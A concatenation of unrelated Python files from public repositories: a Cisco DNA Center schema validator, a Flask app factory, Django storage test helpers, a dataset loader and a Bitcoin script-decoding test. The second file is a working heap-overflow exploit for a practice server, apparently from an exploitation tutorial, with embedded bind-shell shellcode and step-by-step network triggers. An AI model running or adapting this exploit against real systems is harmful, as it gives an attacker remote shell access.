39abf72ba31a0277445f4961c61a6ea6ec03244c | 2,460 | py | Python | tests/models/validators/v2_2_2_3/jsd_bd26b08b64545bae20f60c56891576.py | oboehmer/dnacentersdk | 25c4e99900640deee91a56aa886874d9cb0ca960 | ["MIT"] | 32 | 2019-09-05T05:16:56.000Z | 2022-03-22T09:50:38.000Z | tests/models/validators/v2_2_2_3/jsd_bd26b08b64545bae20f60c56891576.py | oboehmer/dnacentersdk | 25c4e99900640deee91a56aa886874d9cb0ca960 | ["MIT"] | 35 | 2019-09-07T18:58:54.000Z | 2022-03-24T19:29:36.000Z | tests/models/validators/v2_2_2_3/jsd_bd26b08b64545bae20f60c56891576.py | oboehmer/dnacentersdk | 25c4e99900640deee91a56aa886874d9cb0ca960 | ["MIT"] | 18 | 2019-09-09T11:07:21.000Z | 2022-03-25T08:49:59.000Z |
# -*- coding: utf-8 -*-
"""Cisco DNA Center DeletePortAssignmentForAccessPoint data model.
Copyright (c) 2019-2021 Cisco Systems.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import fastjsonschema
import json
from dnacentersdk.exceptions import MalformedRequest
from builtins import *
class JSONSchemaValidatorBd26B08B64545BAe20F60C56891576(object):
"""DeletePortAssignmentForAccessPoint request schema definition."""
def __init__(self):
super(JSONSchemaValidatorBd26B08B64545BAe20F60C56891576, self).__init__()
self._validator = fastjsonschema.compile(json.loads(
'''{
"$schema": "http://json-schema.org/draft-04/schema#",
"properties": {
"description":
{
"type": "string"
},
"executionStatusUrl": {
"type": "string"
},
"status": {
"type": "string"
}
},
"type": "object"
}'''.replace("\n" + ' ' * 16, '')
))
def validate(self, request):
try:
self._validator(request)
except fastjsonschema.exceptions.JsonSchemaException as e:
raise MalformedRequest(
'{} is invalid. Reason: {}'.format(request, e.message)
)
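# --- Added illustration (not part of the original module) ---
# A hedged usage sketch: validating a hand-built payload against the schema
# compiled above. The field values are made up.
if __name__ == '__main__':
    _sample = {
        'description': 'Port assignment removed',
        'executionStatusUrl': '/dna/intent/api/v1/task/abc123',
        'status': 'pending',
    }
    JSONSchemaValidatorBd26B08B64545BAe20F60C56891576().validate(_sample)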
| 35.142857 | 81 | 0.658537 |
775170709fe2da34703e3631758c9532cd68ccdb | 2,962 | py | Python | heap_overflows_for_humans/serve_heap/serve_heap_exploit.py | iphelix/exploits | 1c72773149a2876c9f0fe9d37af8712b3d7c72b9 | ["Apache-2.0"] | 5 | 2018-11-23T07:56:54.000Z | 2021-11-17T17:50:19.000Z | heap_overflows_for_humans/serve_heap/serve_heap_exploit.py | iphelix/exploits | 1c72773149a2876c9f0fe9d37af8712b3d7c72b9 | ["Apache-2.0"] | null | null | null | heap_overflows_for_humans/serve_heap/serve_heap_exploit.py | iphelix/exploits | 1c72773149a2876c9f0fe9d37af8712b3d7c72b9 | ["Apache-2.0"] | 2 | 2021-02-26T22:54:47.000Z | 2021-11-17T17:50:21.000Z |
#!/usr/bin/env python
#
# serve_heap heap overflow exploit
# by iphelix
#
# Tested on Windows XP SP3 with DEP set to AlwaysOn
import sys, socket
from struct import pack
from binascii import hexlify
HOST = sys.argv[1]
PORT = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
target = pack("I",0x004061b0) # 0x004061b0 - memcpy
scaddr = pack("I",0x004926b0) # shellcode address
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
# BADCHARS='\x00\x20'
shellcode = (
"\xba\x3b\xaf\x2d\xf2\xda\xd9\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x56\x31\x56\x13\x03\x56\x13\x83\xee\xc7\x4d\xd8\x0e\xdf\x1b"
"\x23\xef\x1f\x7c\xad\x0a\x2e\xae\xc9\x5f\x02\x7e\x99\x32\xae"
"\xf5\xcf\xa6\x25\x7b\xd8\xc9\x8e\x36\x3e\xe7\x0f\xf7\xfe\xab"
"\xd3\x99\x82\xb1\x07\x7a\xba\x79\x5a\x7b\xfb\x64\x94\x29\x54"
"\xe2\x06\xde\xd1\xb6\x9a\xdf\x35\xbd\xa2\xa7\x30\x02\x56\x12"
"\x3a\x53\xc6\x29\x74\x4b\x6d\x75\xa5\x6a\xa2\x65\x99\x25\xcf"
"\x5e\x69\xb4\x19\xaf\x92\x86\x65\x7c\xad\x26\x68\x7c\xe9\x81"
"\x92\x0b\x01\xf2\x2f\x0c\xd2\x88\xeb\x99\xc7\x2b\x78\x39\x2c"
"\xcd\xad\xdc\xa7\xc1\x1a\xaa\xe0\xc5\x9d\x7f\x9b\xf2\x16\x7e"
"\x4c\x73\x6c\xa5\x48\xdf\x37\xc4\xc9\x85\x96\xf9\x0a\x61\x47"
"\x5c\x40\x80\x9c\xe6\x0b\xcd\x51\xd5\xb3\x0d\xfd\x6e\xc7\x3f"
"\xa2\xc4\x4f\x0c\x2b\xc3\x88\x73\x06\xb3\x07\x8a\xa8\xc4\x0e"
"\x49\xfc\x94\x38\x78\x7c\x7f\xb9\x85\xa9\xd0\xe9\x29\x01\x91"
"\x59\x8a\xf1\x79\xb0\x05\x2e\x99\xbb\xcf\x59\x9d\x75\x2b\x0a"
"\x4a\x74\xcb\xbd\xd6\xf1\x2d\xd7\xf6\x57\xe5\x4f\x35\x8c\x3e"
"\xe8\x46\xe6\x12\xa1\xd0\xbe\x7c\x75\xde\x3e\xab\xd6\x73\x96"
"\x3c\xac\x9f\x23\x5c\xb3\xb5\x03\x17\x8c\x5e\xd9\x49\x5f\xfe"
"\xde\x43\x37\x63\x4c\x08\xc7\xea\x6d\x87\x90\xbb\x40\xde\x74"
"\x56\xfa\x48\x6a\xab\x9a\xb3\x2e\x70\x5f\x3d\xaf\xf5\xdb\x19"
"\xbf\xc3\xe4\x25\xeb\x9b\xb2\xf3\x45\x5a\x6d\xb2\x3f\x34\xc2"
"\x1c\xd7\xc1\x28\x9f\xa1\xcd\x64\x69\x4d\x7f\xd1\x2c\x72\xb0"
"\xb5\xb8\x0b\xac\x25\x46\xc6\x74\x55\x0d\x4a\xdc\xfe\xc8\x1f"
"\x5c\x63\xeb\xca\xa3\x9a\x68\xfe\x5b\x59\x70\x8b\x5e\x25\x36"
"\x60\x13\x36\xd3\x86\x80\x37\xf6"
)
shellcode = hexlify(shellcode) # encode shellcode
print "%s" % s.recv(1024)
# 0) Spray the shellcode
for i in range(20):
payload = " deadbeef" + "20" + "90"*(2039 - len(shellcode)/2) + shellcode
s.sendall("HTER " + payload)
print "%s" % s.recv(1024)
# 1) Allocate chunk A
s.sendall("KSTET " + "A"*8 + "\x00")
print "%s" % s.recv(1024)
# 2) Allocate and free chunk B
s.sendall("GMON " + "A"*8 + "\x00")
print "%s" % s.recv(1024)
# 3) Overflow chunk A and overwrite chunk B's flink
s.sendall("GTER " + "A"*8 + "B"*8 + target)
print "%s" % s.recv(1024)
# 4) Allocate chunk B and chunk C. Overwrite the target.
s.sendall("STATS " + scaddr)
print "%s" % s.recv(1024)
# 5) Trigger the shellcode
s.sendall("HELP" + "\x00")
s.close()
| 35.686747 | 77 | 0.695138 |
258b4f782c0334030c92b8dc80907b23316e4970 | 1,246 | py | Python | recipebox/__init__.py | Caffrey-Hill/recipebox | e67f478f390c50f1bd7e46ab589564eac8379a23 | ["MIT"] | null | null | null | recipebox/__init__.py | Caffrey-Hill/recipebox | e67f478f390c50f1bd7e46ab589564eac8379a23 | ["MIT"] | 2 | 2020-12-26T14:29:51.000Z | 2020-12-26T14:30:19.000Z | recipebox/__init__.py | Caffrey-Hill/recipebox | e67f478f390c50f1bd7e46ab589564eac8379a23 | ["MIT"] | null | null | null |
from flask import Flask, render_template
def create_app(config=None):
app = Flask(__name__)
if isinstance(config, dict):
for key in config:
app.config[key] = config[key]
app.config.from_object('recipebox.default_settings')
app.config.from_envvar('RECIPEBOX_SETTINGS', silent=True)
from .models import db
db.init_app(app)
from .recipes import recipes
app.register_blueprint(recipes, url_prefix="/recipes")
from .groceries import groceries
app.register_blueprint(groceries, url_prefix="/groceries")
from .meal_plan import meal_plan
app.register_blueprint(meal_plan, url_prefix="/meal_plan")
from .inventory import inventory
app.register_blueprint(inventory, url_prefix="/inventory")
from .api import api
app.register_blueprint(api, url_prefix="/api")
@app.route("/")
def index():
return render_template("welcome.html")
@app.errorhandler(400)
@app.errorhandler(401)
@app.errorhandler(403)
@app.errorhandler(404)
@app.errorhandler(500)
def handle_error(error):
return render_template("error.html", error=error), error.code
from .cli import init_db
app.cli.add_command(init_db)
return app
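# --- Added illustration (not part of the original package) ---
# A hedged sketch of running the application factory above for local
# development; the config override key is a placeholder.
if __name__ == '__main__':
    create_app({'DEBUG': True}).run()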
| 28.318182 | 69 | 0.696629 |
1151805592bc989c97a94f47c654eb62045727f9 | 2,900 | py | Python | tests/tests/test_helpers.py | barberscore/django-cloudinary-storage | e339bec0209ebb636c5f28ddae78f22340dd86ce | ["MIT"] | 1 | 2017-08-07T15:46:35.000Z | 2017-08-07T15:46:35.000Z | tests/tests/test_helpers.py | barberscore/django-cloudinary-storage | e339bec0209ebb636c5f28ddae78f22340dd86ce | ["MIT"] | null | null | null | tests/tests/test_helpers.py | barberscore/django-cloudinary-storage | e339bec0209ebb636c5f28ddae78f22340dd86ce | ["MIT"] | null | null | null |
import errno
import os
from io import StringIO
from uuid import uuid4
from cloudinary_storage import app_settings
from cloudinary_storage.management.commands.deleteorphanedmedia import \
Command as DeleteOrphanedMediaCommand
from cloudinary_storage.storage import (HashedFilesMixin,
MediaCloudinaryStorage,
StaticHashedCloudinaryStorage)
from django.core.files import File
from django.core.management import call_command
from django.utils import version
def get_random_name():
return str(uuid4())
def set_media_tag(tag):
MediaCloudinaryStorage.TAG = tag
DeleteOrphanedMediaCommand.TAG = tag
app_settings.MEDIA_TAG = tag
def execute_command(*args):
out = StringIO()
call_command(*args, stdout=out)
return out.getvalue()
class StaticHashedStorageTestsMixin(object):
@classmethod
def setUpClass(cls):
StaticHashedCloudinaryStorage.manifest_name = get_random_name()
hash_mixin = HashedFilesMixin()
content = File(open(os.path.join('tests', 'static', 'tests', 'css', 'style.css'), 'rb'))
cls.style_hash = hash_mixin.file_hash('tests/css/style.css', content)
content.close()
content = File(open(os.path.join('tests', 'static', 'tests', 'images', 'dummy-static-image.jpg'), 'rb'))
cls.image_hash = hash_mixin.file_hash('tests/images/dummy-static-image.jpg', content)
content.close()
name = StaticHashedCloudinaryStorage.manifest_name
cls.manifest_path = os.path.join(app_settings.STATICFILES_MANIFEST_ROOT, name)
super(StaticHashedStorageTestsMixin, cls).setUpClass()
@classmethod
def tearDownClass(cls):
try:
os.remove(cls.manifest_path)
except (IOError, OSError) as e:
if e.errno != errno.ENOENT:
raise
super(StaticHashedStorageTestsMixin, cls).tearDownClass()
StaticHashedCloudinaryStorage.manifest_name = 'staticfiles.json'
def import_mock():
try:
from unittest import mock
except ImportError:
import mock
finally:
return mock
def get_save_calls_counter_in_postprocess_of_adjustable_file():
"""
    Since Django 1.11, the post-processing algorithm for CSS files has changed
    in such a way that save is called 4 times in total.
    This must be taken into consideration in unit tests.
    Hopefully this can be removed at some point once Django introduces an optimization
    of the post-processing handler.
"""
if version.get_complete_version() >= (1, 11):
return 4
return 1
def get_postprocess_counter_of_adjustable_file():
"""
    Since Django 1.11, the post-processing algorithm for CSS files has changed
    in such a way that they are post-processed twice.
"""
if version.get_complete_version() >= (1, 11):
return 2
return 1
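# --- Added illustration (not part of the original test helpers) ---
# A hedged sketch of how a test might combine the helpers above: patch the
# storage's save method, run collectstatic, and compare the call count against
# the version-dependent expectation. `storage_cls` is a placeholder argument.
def _example_postprocess_call_count(storage_cls):
    mock = import_mock()
    expected = get_save_calls_counter_in_postprocess_of_adjustable_file()
    with mock.patch.object(storage_cls, 'save') as save_mock:
        execute_command('collectstatic', '--noinput')
    assert save_mock.call_count >= expected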
| 32.58427 | 112 | 0.692069 |
7ad7e1ba5ac268996b399982bbd29956272ca6df | 356 | py | Python | ampel/base/BadConfig.py | AmpelProject/Ampel-interface | 3c272565c6817555e5a350f12c7d0e11f7d46bb9 | ["BSD-3-Clause"] | null | null | null | ampel/base/BadConfig.py | AmpelProject/Ampel-interface | 3c272565c6817555e5a350f12c7d0e11f7d46bb9 | ["BSD-3-Clause"] | 8 | 2019-12-26T22:44:41.000Z | 2021-12-15T12:06:42.000Z | ampel/base/BadConfig.py | AmpelProject/Ampel-interface | 3c272565c6817555e5a350f12c7d0e11f7d46bb9 | ["BSD-3-Clause"] | 1 | 2020-01-20T14:01:38.000Z | 2020-01-20T14:01:38.000Z |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File : Ampel-interface/ampel/base/BadConfig.py
# License : BSD-3-Clause
# Author : vb <vbrinnel@physik.hu-berlin.de>
# Date : 17.02.2021
# Last Modified Date: 17.02.2021
# Last Modified By : vb <vbrinnel@physik.hu-berlin.de>
class BadConfig(Exception):
pass
| 29.666667 | 61 | 0.603933 |
0849a9a6c803a42d19fdbc61f5ab49cdf242acf2 | 1,913 | py | Python | ssseg/modules/datasets/sbushadow.py | zhizhangxian/sssegmentation | 90613f6e0abf4cdd729cf382ab2a915e106d8649 | ["MIT"] | 411 | 2020-10-22T02:24:57.000Z | 2022-03-31T11:19:17.000Z | ssseg/modules/datasets/sbushadow.py | zhizhangxian/sssegmentation | 90613f6e0abf4cdd729cf382ab2a915e106d8649 | ["MIT"] | 24 | 2020-12-21T03:53:54.000Z | 2022-03-17T06:50:00.000Z | ssseg/modules/datasets/sbushadow.py | zhizhangxian/sssegmentation | 90613f6e0abf4cdd729cf382ab2a915e106d8649 | ["MIT"] | 59 | 2020-12-04T03:40:12.000Z | 2022-03-30T09:12:47.000Z |
'''
Function:
load the sbu-shadow dataset
Author:
Zhenchao Jin
'''
import os
from .base import *
'''sbu-shadow dataset'''
class SBUShadowDataset(BaseDataset):
num_classes = 2
classnames = ['__backgroud__', 'shadow']
def __init__(self, mode, logger_handle, dataset_cfg, **kwargs):
super(SBUShadowDataset, self).__init__(mode, logger_handle, dataset_cfg, **kwargs)
# obtain the dirs
setmap_dict = {'train': 'SBUTrain4KRecoveredSmall', 'val': 'SBU-Test'}
rootdir = dataset_cfg['rootdir']
self.image_dir = os.path.join(rootdir, setmap_dict[dataset_cfg['set']], 'ShadowImages')
self.ann_dir = os.path.join(rootdir, setmap_dict[dataset_cfg['set']], 'ShadowMasks')
        # obtain imageids
self.imageids = []
for line in open(os.path.join(rootdir, dataset_cfg['set']+'.txt'), 'r').readlines():
if line.strip(): self.imageids.append(line.strip())
self.imageids = [str(_id) for _id in self.imageids]
'''pull item'''
def __getitem__(self, index):
imageid = self.imageids[index]
imagepath = os.path.join(self.image_dir, imageid+'.jpg')
annpath = os.path.join(self.ann_dir, imageid+'.png')
sample = self.read(imagepath, annpath, self.dataset_cfg.get('with_ann', True))
sample.update({'id': imageid})
if self.mode == 'TRAIN':
sample['segmentation'][sample['segmentation'] > 0] = 1.
sample = self.synctransform(sample, 'without_totensor_normalize_pad')
sample['edge'] = self.generateedge(sample['segmentation'].copy())
sample = self.synctransform(sample, 'only_totensor_normalize_pad')
else:
sample['groundtruth'][sample['groundtruth'] > 0] = 1.
sample = self.synctransform(sample, 'all')
return sample
'''length'''
def __len__(self):
return len(self.imageids)
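'''Added illustration (not part of the original module): a hedged sketch of
instantiating the dataset above; rootdir is a placeholder and logger_handle is
whatever logger the caller already uses.'''
def _example_build_sbushadow(logger_handle):
    dataset_cfg = {'rootdir': '/path/to/SBUShadow', 'set': 'train'}
    return SBUShadowDataset(mode='TRAIN', logger_handle=logger_handle, dataset_cfg=dataset_cfg)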
| 42.511111 | 95 | 0.632514 |
5b1514af6f18c650eaffd786d782be82fa3ccef9 | 16,557 | py | Python | test/functional/rpc_decodescript.py | crptec/sinovate | 345a81f99ec7e624e0ec244a7dbe1ebb3698c347 | ["MIT"] | 213 | 2015-01-25T19:45:22.000Z | 2022-02-24T22:48:03.000Z | test/functional/rpc_decodescript.py | crptec/sinovate | 345a81f99ec7e624e0ec244a7dbe1ebb3698c347 | ["MIT"] | 51 | 2019-11-03T04:00:14.000Z | 2022-03-30T07:17:34.000Z | test/functional/rpc_decodescript.py | crptec/sinovate | 345a81f99ec7e624e0ec244a7dbe1ebb3698c347 | ["MIT"] | 32 | 2015-05-12T17:42:55.000Z | 2022-01-26T11:02:51.000Z |
#!/usr/bin/env python3
# Copyright (c) 2015-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test decoding scripts via decodescript RPC command."""
from test_framework.messages import (
sha256,
tx_from_hex,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
)
class DecodeScriptTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def decodescript_script_sig(self):
signature = '304502207fa7a6d1e0ee81132a269ad84e68d695483745cde8b541e3bf630749894e342a022100c1f7ab20e13e22fb95281a870f3dcf38d782e53023ee313d741ad0cfbc0c509001'
push_signature = '48' + signature
public_key = '03b0da749730dc9b4b1f4a14d6902877a92541f5368778853d9c4a0cb7802dcfb2'
push_public_key = '21' + public_key
# below are test cases for all of the standard transaction types
# 1) P2PK scriptSig
# the scriptSig of a public key scriptPubKey simply pushes a signature onto the stack
rpc_result = self.nodes[0].decodescript(push_signature)
assert_equal(signature, rpc_result['asm'])
# 2) P2PKH scriptSig
rpc_result = self.nodes[0].decodescript(push_signature + push_public_key)
assert_equal(signature + ' ' + public_key, rpc_result['asm'])
# 3) multisig scriptSig
# this also tests the leading portion of a P2SH multisig scriptSig
# OP_0 <A sig> <B sig>
rpc_result = self.nodes[0].decodescript('00' + push_signature + push_signature)
assert_equal('0 ' + signature + ' ' + signature, rpc_result['asm'])
# 4) P2SH scriptSig
# an empty P2SH redeemScript is valid and makes for a very simple test case.
# thus, such a spending scriptSig would just need to pass the outer redeemScript
# hash test and leave true on the top of the stack.
rpc_result = self.nodes[0].decodescript('5100')
assert_equal('1 0', rpc_result['asm'])
# 5) null data scriptSig - no such thing because null data scripts can not be spent.
# thus, no test case for that standard transaction type is here.
def decodescript_script_pub_key(self):
public_key = '03b0da749730dc9b4b1f4a14d6902877a92541f5368778853d9c4a0cb7802dcfb2'
push_public_key = '21' + public_key
public_key_hash = '5dd1d3a048119c27b28293056724d9522f26d945'
push_public_key_hash = '14' + public_key_hash
uncompressed_public_key = '04b0da749730dc9b4b1f4a14d6902877a92541f5368778853d9c4a0cb7802dcfb25e01fc8fde47c96c98a4f3a8123e33a38a50cf9025cc8c4494a518f991792bb7'
push_uncompressed_public_key = '41' + uncompressed_public_key
p2wsh_p2pk_script_hash = 'd8590cf8ea0674cf3d49fd7ca249b85ef7485dea62c138468bddeb20cd6519f7'
# below are test cases for all of the standard transaction types
# 1) P2PK scriptPubKey
# <pubkey> OP_CHECKSIG
rpc_result = self.nodes[0].decodescript(push_public_key + 'ac')
assert_equal(public_key + ' OP_CHECKSIG', rpc_result['asm'])
# P2PK is translated to P2WPKH
assert_equal('0 ' + public_key_hash, rpc_result['segwit']['asm'])
# 2) P2PKH scriptPubKey
# OP_DUP OP_HASH160 <PubKeyHash> OP_EQUALVERIFY OP_CHECKSIG
rpc_result = self.nodes[0].decodescript('76a9' + push_public_key_hash + '88ac')
assert_equal('OP_DUP OP_HASH160 ' + public_key_hash + ' OP_EQUALVERIFY OP_CHECKSIG', rpc_result['asm'])
# P2PKH is translated to P2WPKH
assert_equal('0 ' + public_key_hash, rpc_result['segwit']['asm'])
# 3) multisig scriptPubKey
# <m> <A pubkey> <B pubkey> <C pubkey> <n> OP_CHECKMULTISIG
# just imagine that the pub keys used below are different.
# for our purposes here it does not matter that they are the same even though it is unrealistic.
multisig_script = '52' + push_public_key + push_public_key + push_public_key + '53ae'
rpc_result = self.nodes[0].decodescript(multisig_script)
assert_equal('2 ' + public_key + ' ' + public_key + ' ' + public_key + ' 3 OP_CHECKMULTISIG', rpc_result['asm'])
# multisig in P2WSH
multisig_script_hash = sha256(bytes.fromhex(multisig_script)).hex()
assert_equal('0 ' + multisig_script_hash, rpc_result['segwit']['asm'])
# 4) P2SH scriptPubKey
# OP_HASH160 <Hash160(redeemScript)> OP_EQUAL.
# push_public_key_hash here should actually be the hash of a redeem script.
# but this works the same for purposes of this test.
rpc_result = self.nodes[0].decodescript('a9' + push_public_key_hash + '87')
assert_equal('OP_HASH160 ' + public_key_hash + ' OP_EQUAL', rpc_result['asm'])
        # P2SH does not work in segwit scripts. decodescript should not return a result for it.
assert 'segwit' not in rpc_result
# 5) null data scriptPubKey
# use a signature look-alike here to make sure that we do not decode random data as a signature.
# this matters if/when signature sighash decoding comes along.
# would want to make sure that no such decoding takes place in this case.
signature_imposter = '48304502207fa7a6d1e0ee81132a269ad84e68d695483745cde8b541e3bf630749894e342a022100c1f7ab20e13e22fb95281a870f3dcf38d782e53023ee313d741ad0cfbc0c509001'
# OP_RETURN <data>
rpc_result = self.nodes[0].decodescript('6a' + signature_imposter)
assert_equal('OP_RETURN ' + signature_imposter[2:], rpc_result['asm'])
# 6) a CLTV redeem script. redeem scripts are in-effect scriptPubKey scripts, so adding a test here.
# OP_NOP2 is also known as OP_CHECKLOCKTIMEVERIFY.
# just imagine that the pub keys used below are different.
# for our purposes here it does not matter that they are the same even though it is unrealistic.
#
# OP_IF
# <receiver-pubkey> OP_CHECKSIGVERIFY
# OP_ELSE
# <lock-until> OP_CHECKLOCKTIMEVERIFY OP_DROP
# OP_ENDIF
# <sender-pubkey> OP_CHECKSIG
#
# lock until block 500,000
cltv_script = '63' + push_public_key + 'ad670320a107b17568' + push_public_key + 'ac'
rpc_result = self.nodes[0].decodescript(cltv_script)
assert_equal('OP_IF ' + public_key + ' OP_CHECKSIGVERIFY OP_ELSE 500000 OP_CHECKLOCKTIMEVERIFY OP_DROP OP_ENDIF ' + public_key + ' OP_CHECKSIG', rpc_result['asm'])
# CLTV script in P2WSH
cltv_script_hash = sha256(bytes.fromhex(cltv_script)).hex()
assert_equal('0 ' + cltv_script_hash, rpc_result['segwit']['asm'])
# 7) P2PK scriptPubKey
# <pubkey> OP_CHECKSIG
rpc_result = self.nodes[0].decodescript(push_uncompressed_public_key + 'ac')
assert_equal(uncompressed_public_key + ' OP_CHECKSIG', rpc_result['asm'])
# uncompressed pubkeys are invalid for checksigs in segwit scripts.
# decodescript should not return a P2WPKH equivalent.
assert 'segwit' not in rpc_result
# 8) multisig scriptPubKey with an uncompressed pubkey
# <m> <A pubkey> <B pubkey> <n> OP_CHECKMULTISIG
# just imagine that the pub keys used below are different.
# the purpose of this test is to check that a segwit script is not returned for bare multisig scripts
# with an uncompressed pubkey in them.
rpc_result = self.nodes[0].decodescript('52' + push_public_key + push_uncompressed_public_key +'52ae')
assert_equal('2 ' + public_key + ' ' + uncompressed_public_key + ' 2 OP_CHECKMULTISIG', rpc_result['asm'])
# uncompressed pubkeys are invalid for checksigs in segwit scripts.
# decodescript should not return a P2WPKH equivalent.
assert 'segwit' not in rpc_result
# 9) P2WPKH scriptpubkey
# 0 <PubKeyHash>
rpc_result = self.nodes[0].decodescript('00' + push_public_key_hash)
assert_equal('0 ' + public_key_hash, rpc_result['asm'])
# segwit scripts do not work nested into each other.
# a nested segwit script should not be returned in the results.
assert 'segwit' not in rpc_result
# 10) P2WSH scriptpubkey
# 0 <ScriptHash>
# even though this hash is of a P2PK script which is better used as bare P2WPKH, it should not matter
# for the purpose of this test.
rpc_result = self.nodes[0].decodescript('0020' + p2wsh_p2pk_script_hash)
assert_equal('0 ' + p2wsh_p2pk_script_hash, rpc_result['asm'])
# segwit scripts do not work nested into each other.
# a nested segwit script should not be returned in the results.
assert 'segwit' not in rpc_result
def decoderawtransaction_asm_sighashtype(self):
"""Test decoding scripts via RPC command "decoderawtransaction".
This test is in with the "decodescript" tests because they are testing the same "asm" script decodes.
"""
# this test case uses a random plain vanilla mainnet transaction with a single P2PKH input and output
tx = '0100000001696a20784a2c70143f634e95227dbdfdf0ecd51647052e70854512235f5986ca010000008a47304402207174775824bec6c2700023309a168231ec80b82c6069282f5133e6f11cbb04460220570edc55c7c5da2ca687ebd0372d3546ebc3f810516a002350cac72dfe192dfb014104d3f898e6487787910a690410b7a917ef198905c27fb9d3b0a42da12aceae0544fc7088d239d9a48f2828a15a09e84043001f27cc80d162cb95404e1210161536ffffffff0100e1f505000000001976a914eb6c6e0cdb2d256a32d97b8df1fc75d1920d9bca88ac00000000'
rpc_result = self.nodes[0].decoderawtransaction(tx)
assert_equal('304402207174775824bec6c2700023309a168231ec80b82c6069282f5133e6f11cbb04460220570edc55c7c5da2ca687ebd0372d3546ebc3f810516a002350cac72dfe192dfb[ALL] 04d3f898e6487787910a690410b7a917ef198905c27fb9d3b0a42da12aceae0544fc7088d239d9a48f2828a15a09e84043001f27cc80d162cb95404e1210161536', rpc_result['vin'][0]['scriptSig']['asm'])
# this test case uses a mainnet transaction that has a P2SH input and both P2PKH and P2SH outputs.
# it's from James D'Angelo's awesome introductory videos about multisig: https://www.youtube.com/watch?v=zIbUSaZBJgU and https://www.youtube.com/watch?v=OSA1pwlaypc
# verify that we have not altered scriptPubKey decoding.
tx = '01000000018d1f5635abd06e2c7e2ddf58dc85b3de111e4ad6e0ab51bb0dcf5e84126d927300000000fdfe0000483045022100ae3b4e589dfc9d48cb82d41008dc5fa6a86f94d5c54f9935531924602730ab8002202f88cf464414c4ed9fa11b773c5ee944f66e9b05cc1e51d97abc22ce098937ea01483045022100b44883be035600e9328a01b66c7d8439b74db64187e76b99a68f7893b701d5380220225bf286493e4c4adcf928c40f785422572eb232f84a0b83b0dea823c3a19c75014c695221020743d44be989540d27b1b4bbbcfd17721c337cb6bc9af20eb8a32520b393532f2102c0120a1dda9e51a938d39ddd9fe0ebc45ea97e1d27a7cbd671d5431416d3dd87210213820eb3d5f509d7438c9eeecb4157b2f595105e7cd564b3cdbb9ead3da41eed53aeffffffff02611e0000000000001976a914dc863734a218bfe83ef770ee9d41a27f824a6e5688acee2a02000000000017a9142a5edea39971049a540474c6a99edf0aa4074c588700000000'
rpc_result = self.nodes[0].decoderawtransaction(tx)
assert_equal('8e3730608c3b0bb5df54f09076e196bc292a8e39a78e73b44b6ba08c78f5cbb0', rpc_result['txid'])
assert_equal('0 3045022100ae3b4e589dfc9d48cb82d41008dc5fa6a86f94d5c54f9935531924602730ab8002202f88cf464414c4ed9fa11b773c5ee944f66e9b05cc1e51d97abc22ce098937ea[ALL] 3045022100b44883be035600e9328a01b66c7d8439b74db64187e76b99a68f7893b701d5380220225bf286493e4c4adcf928c40f785422572eb232f84a0b83b0dea823c3a19c75[ALL] 5221020743d44be989540d27b1b4bbbcfd17721c337cb6bc9af20eb8a32520b393532f2102c0120a1dda9e51a938d39ddd9fe0ebc45ea97e1d27a7cbd671d5431416d3dd87210213820eb3d5f509d7438c9eeecb4157b2f595105e7cd564b3cdbb9ead3da41eed53ae', rpc_result['vin'][0]['scriptSig']['asm'])
assert_equal('OP_DUP OP_HASH160 dc863734a218bfe83ef770ee9d41a27f824a6e56 OP_EQUALVERIFY OP_CHECKSIG', rpc_result['vout'][0]['scriptPubKey']['asm'])
assert_equal('OP_HASH160 2a5edea39971049a540474c6a99edf0aa4074c58 OP_EQUAL', rpc_result['vout'][1]['scriptPubKey']['asm'])
txSave = tx_from_hex(tx)
# make sure that a specifically crafted op_return value will not pass all the IsDERSignature checks and then get decoded as a sighash type
tx = '01000000015ded05872fdbda629c7d3d02b194763ce3b9b1535ea884e3c8e765d42e316724020000006b48304502204c10d4064885c42638cbff3585915b322de33762598321145ba033fc796971e2022100bb153ad3baa8b757e30a2175bd32852d2e1cb9080f84d7e32fcdfd667934ef1b012103163c0ff73511ea1743fb5b98384a2ff09dd06949488028fd819f4d83f56264efffffffff0200000000000000000b6a0930060201000201000180380100000000001976a9141cabd296e753837c086da7a45a6c2fe0d49d7b7b88ac00000000'
rpc_result = self.nodes[0].decoderawtransaction(tx)
assert_equal('OP_RETURN 300602010002010001', rpc_result['vout'][0]['scriptPubKey']['asm'])
# verify that we have not altered scriptPubKey processing even of a specially crafted P2PKH pubkeyhash and P2SH redeem script hash that is made to pass the der signature checks
